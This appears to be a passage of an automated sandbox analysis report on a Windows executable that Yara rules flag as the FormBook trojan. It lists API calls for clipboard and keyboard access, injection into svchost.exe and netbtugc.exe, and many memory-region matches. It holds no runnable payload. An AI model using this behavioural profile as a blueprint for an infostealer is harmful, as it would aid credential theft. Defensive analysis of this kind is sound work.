            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000D7099
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_000C4342
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000EF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000EF5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AC4F3 NtClose,2_2_003AC4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82B60 NtClose,LdrInitializeThunk,2_2_00B82B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00B82C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_00B82DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B835C0 NtCreateMutant,LdrInitializeThunk,2_2_00B835C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B84340 NtSetContextThread,2_2_00B84340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B84650 NtSuspendThread,2_2_00B84650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82AB0 NtWaitForSingleObject,2_2_00B82AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82AF0 NtWriteFile,2_2_00B82AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82AD0 NtReadFile,2_2_00B82AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82BA0 NtEnumerateValueKey,2_2_00B82BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82B80 NtQueryInformationFile,2_2_00B82B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82BF0 NtAllocateVirtualMemory,2_2_00B82BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82BE0 NtQueryValueKey,2_2_00B82BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82CA0 NtQueryInformationToken,2_2_00B82CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82CF0 NtOpenProcess,2_2_00B82CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82CC0 NtQueryVirtualMemory,2_2_00B82CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82C00 NtQueryInformationProcess,2_2_00B82C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82C60 NtCreateKey,2_2_00B82C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82DB0 NtEnumerateKey,2_2_00B82DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82DD0 NtDelayExecution,2_2_00B82DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82D30 NtUnmapViewOfSection,2_2_00B82D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82D10 NtMapViewOfSection,2_2_00B82D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82D00 NtSetInformationFile,2_2_00B82D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82EA0 NtAdjustPrivilegesToken,2_2_00B82EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82E80 NtReadVirtualMemory,2_2_00B82E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82EE0 NtQueueApcThread,2_2_00B82EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82E30 NtWriteVirtualMemory,2_2_00B82E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82FB0 NtResumeThread,2_2_00B82FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82FA0 NtQuerySection,2_2_00B82FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82F90 NtProtectVirtualMemory,2_2_00B82F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82FE0 NtCreateFile,2_2_00B82FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82F30 NtCreateSection,2_2_00B82F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82F60 NtCreateProcessEx,2_2_00B82F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B83090 NtSetValueKey,2_2_00B83090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B83010 NtOpenDirectoryObject,2_2_00B83010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B839B0 NtGetContextThread,2_2_00B839B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B83D10 NtOpenProcessToken,2_2_00B83D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B83D70 NtOpenThread,2_2_00B83D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03974340 NtSetContextThread,LdrInitializeThunk,6_2_03974340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03974650 NtSuspendThread,LdrInitializeThunk,6_2_03974650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03972BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03972BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03972BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972B60 NtClose,LdrInitializeThunk,6_2_03972B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972AD0 NtReadFile,LdrInitializeThunk,6_2_03972AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972AF0 NtWriteFile,LdrInitializeThunk,6_2_03972AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972FB0 NtResumeThread,LdrInitializeThunk,6_2_03972FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972FE0 NtCreateFile,LdrInitializeThunk,6_2_03972FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972F30 NtCreateSection,LdrInitializeThunk,6_2_03972F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03972E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03972EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972DD0 NtDelayExecution,LdrInitializeThunk,6_2_03972DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03972DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03972D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03972D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03972CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03972C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972C60 NtCreateKey,LdrInitializeThunk,6_2_03972C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039735C0 NtCreateMutant,LdrInitializeThunk,6_2_039735C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039739B0 NtGetContextThread,LdrInitializeThunk,6_2_039739B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972B80 NtQueryInformationFile,6_2_03972B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972AB0 NtWaitForSingleObject,6_2_03972AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972F90 NtProtectVirtualMemory,6_2_03972F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972FA0 NtQuerySection,6_2_03972FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972F60 NtCreateProcessEx,6_2_03972F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972EA0 NtAdjustPrivilegesToken,6_2_03972EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972E30 NtWriteVirtualMemory,6_2_03972E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972DB0 NtEnumerateKey,6_2_03972DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972D00 NtSetInformationFile,6_2_03972D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972CC0 NtQueryVirtualMemory,6_2_03972CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972CF0 NtOpenProcess,6_2_03972CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972C00 NtQueryInformationProcess,6_2_03972C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03973090 NtSetValueKey,6_2_03973090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03973010 NtOpenDirectoryObject,6_2_03973010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03973D10 NtOpenProcessToken,6_2_03973D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03973D70 NtOpenThread,6_2_03973D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03228B30 NtCreateFile,6_2_03228B30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03228FB0 NtAllocateVirtualMemory,6_2_03228FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03228E40 NtClose,6_2_03228E40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03228D90 NtDeleteFile,6_2_03228D90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03228CA0 NtReadFile,6_2_03228CA0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_000C702F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000BB9F1
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_000C82D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00092B400_2_00092B40
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000936800_2_00093680
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000ABDF60_2_000ABDF6
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0008A0C00_2_0008A0C0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A01830_2_000A0183
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C220C0_2_000C220C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000885300_2_00088530
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000866700_2_00086670
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A06770_2_000A0677
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B87790_2_000B8779
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000EA8DC0_2_000EA8DC
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A0A8F0_2_000A0A8F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00086BBC0_2_00086BBC
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000AAC830_2_000AAC83
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00088CA00_2_00088CA0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009AD5C0_2_0009AD5C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B4EBF0_2_000B4EBF
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A0EC40_2_000A0EC4
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000E30AD0_2_000E30AD
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B113E0_2_000B113E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A12F90_2_000A12F9
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B542F0_2_000B542F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000EF5D00_2_000EF5D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B599F0_2_000B599F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000ADA740_2_000ADA74
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0008DCD00_2_0008DCD0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00085D320_2_00085D32
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0008BDF00_2_0008BDF0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A1E5A0_2_000A1E5A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000ADF690_2_000ADF69
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CBFB80_2_000CBFB8
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B7FFD0_2_000B7FFD
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00A4F2F30_2_00A4F2F3
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00A52FD80_2_00A52FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003985732_2_00398573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003900332_2_00390033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038E0B32_2_0038E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003830A02_2_003830A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003830972_2_00383097
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00382A302_2_00382A30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AEAD32_2_003AEAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003834302_2_00383430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003824D02_2_003824D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038FE132_2_0038FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003826A02_2_003826A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003967532_2_00396753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039674E2_2_0039674E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE20002_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C081CC2_2_00C081CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C041A22_2_00C041A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C101AA2_2_00C101AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEA1182_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B401002_2_00B40100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD81582_2_00BD8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD02C02_2_00BD02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF02742_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C103E62_2_00C103E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E3F02_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A3522_2_00C0A352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFE4F62_2_00BFE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C024462_2_00C02446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF44202_2_00BF4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C105912_2_00C10591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B505352_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6C6E02_2_00B6C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4C7C02_2_00B4C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B507702_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B747502_2_00B74750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B368B82_2_00B368B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E8F02_2_00B7E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B528402_2_00B52840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5A8402_2_00B5A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A02_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C1A9A62_2_00C1A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B669622_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA802_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C06BD72_2_00C06BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0AB402_2_00C0AB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0CB52_2_00BF0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40CF22_2_00B40CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50C002_2_00B50C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B68DBF2_2_00B68DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4ADE02_2_00B4ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BECD1F2_2_00BECD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5AD002_2_00B5AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0EEDB2_2_00C0EEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62E902_2_00B62E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0CE932_2_00C0CE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0EE262_2_00C0EE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50E592_2_00B50E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCEFA02_2_00BCEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5CFE02_2_00B5CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42FC82_2_00B42FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70F302_2_00B70F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF2F302_2_00BF2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B92F282_2_00B92F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC4F402_2_00BC4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0F0E02_2_00C0F0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C070E92_2_00C070E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFF0CC2_2_00BFF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B570C02_2_00B570C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5B1B02_2_00B5B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C1B16B2_2_00C1B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3F1722_2_00B3F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8516C2_2_00B8516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B552A02_2_00B552A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF12ED2_2_00BF12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6B2C02_2_00B6B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B9739A2_2_00B9739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0132D2_2_00C0132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3D34C2_2_00B3D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B414602_2_00B41460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0F43F2_2_00C0F43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C195C32_2_00C195C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BED5B02_2_00BED5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C075712_2_00C07571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C016CC2_2_00C016CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B956302_2_00B95630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0F7B02_2_00C0F7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B538E02_2_00B538E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBD8002_2_00BBD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE59102_2_00BE5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B599502_2_00B59950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6B9502_2_00B6B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEDAAC2_2_00BEDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B95AA02_2_00B95AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF1AA32_2_00BF1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFDAC62_2_00BFDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C07A462_2_00C07A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0FA492_2_00C0FA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC3A6C2_2_00BC3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6FB802_2_00B6FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8DBF92_2_00B8DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC5BF02_2_00BC5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0FB762_2_00C0FB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0FCF22_2_00C0FCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC9C322_2_00BC9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6FDC02_2_00B6FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C01D5A2_2_00C01D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C07D732_2_00C07D73
